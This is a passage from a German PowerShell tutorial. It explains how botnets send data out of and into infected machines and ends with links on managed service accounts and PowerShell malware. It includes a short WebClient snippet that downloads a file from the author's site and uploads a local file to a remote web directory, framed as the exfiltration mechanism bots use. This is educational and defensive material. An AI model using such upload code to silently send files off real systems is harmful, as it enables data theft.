6 BotNetze

Ich zeige in diesem Kapitel kurz die Funktionsweise von Trojanern und Bots mittels Powershell. In der Realität werden Hacker eher andere Tools als ein Powershellskript nutzen, aber es geht hier auch nur ums Prinzip.

Einen guten Überblick über BotNetze findet man unter :

Bundesamt für Sicherheit in der Informationstechnik: Botnetze   

Beim zweiten Link beachtet das Wort "Basisschutz". Jenach Gefährdungsportential eurer Computer oder eurer Daten ist möglicherweise ein wesentlich höherer Aufwand notwändig, um eure Daten angemessen zu schützen. So könntet ihr beispielsweise euren zentralen Internetzugang dahingehend überwachen, ob Uploads von Clients aus eurem Netzwerk zu den BotNet-Servern durchgeführt werden. Aus diesen Verbindungsdaten könnt ihr auf befallene Clients schließen.

 

Für einen Angreifer bzw. ein Botnetz können die beiden Szenarien "Datenversand aus dem angegriffenen System" und "Datenversand zum angegriffenen System" interessant sein. Powershell oder besser DotNet bietet auch hier Klassen an, mit denen der Datenaustausch mit einem Remotesystem ein Leichtes ist, solange keine weiteren Schutzmechanismen wie eine effektive Firewall, vorhanden sind.

 

Beispiel 1: Senden und Empfangen von Daten über Http/ Ftp

#Download
$Uri = "http://powershellpraxis.de/tmp/securitytest.txt"
$LocalDestination = "c:\temp\securitytest.txt"
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($Uri, $LocalDestination )

#Upload
$Uri = "http://powershellpraxis.de/temp/"
$Localsource = "c:\temp\upload.txt"
$WebClient.UploadFile($Uri, $Localsource )

MSDN: System.Net.WebClient-Klasse

Anmerkungen

  • Solange auf den lokalen Pfad zugegriffen werden kann, werden nicht einmal Adminrechte benötigt
  • Die Webclient-Klasse ist so flexibel, dass der FTP-Transfer ebenso funktioniert, wenn in die URI einen FTP-Pfad enthält
  • Den Download-Code könnt ihr einfach ausprobieren. Ich habe im angegeben Verzeichnis eine einfache Textdatei ohne ausführbaren Code hinterlegt. 
            http://powershellpraxis.de/tmp/SecurityTest.txt
  • Das Upload-Beispiel sollte nicht funktionieren, aber nur mangels Rechten auf meinem Webverzeichnis.

Welche Auswirkungen das unbemerkte Senden oder Empfangen von Dateinen haben kann, kann sich wohl jeder selbst ausmalen.

Solche Mechanismen nutzten auch große Botnets wie Zeus oder Citadel. Sobald beispielsweise die BotNet-Clientkomponente eine Tastatureingabe aufzeichnet, die nach KreditkartenNummer oder Passwort aussieht, sendet er diese an ein bestimmte WebServer.

Andersherum können BotNets auf vielen Tausend befallenen Clientrechnern zentral von Kriminellen konfiguriert werden, in dem kleine Configdateien auf diese tausenden befallenen Rechnern "upgedatet" werden.

Befallene Clients können so genutzt werden, um beispielsweise DenialAttacks gegen bestimmte Websiten zu fahren, Spams zu versenden, oder um von einem befallenen Firmenclient aus weiter in die Infrastruktur dieser Firma vorzudringen und vertrauliche Informationen auszuspionieren.

 

7 Managed ServiceAccounts

Technet: Managed Service Accounts: Understanding, Implementing, Best Practices, and Troubleshooting

 

8 Viren und Powershell


Trendmicro: Word and Excel Files Infected Using Windows Powershell (March, 27 2014)

Exploit Monday: Analyzing the "Power Worm" PowerShell-based Malware (April, 05 2014)


Auch wenn die Virenschützer seit dem 29. März 2014 ein Pattern haben, ist der Artikel in "Exploit Monday" sehr lesenswert!

TrendMicro: Solution (March, 29 2014)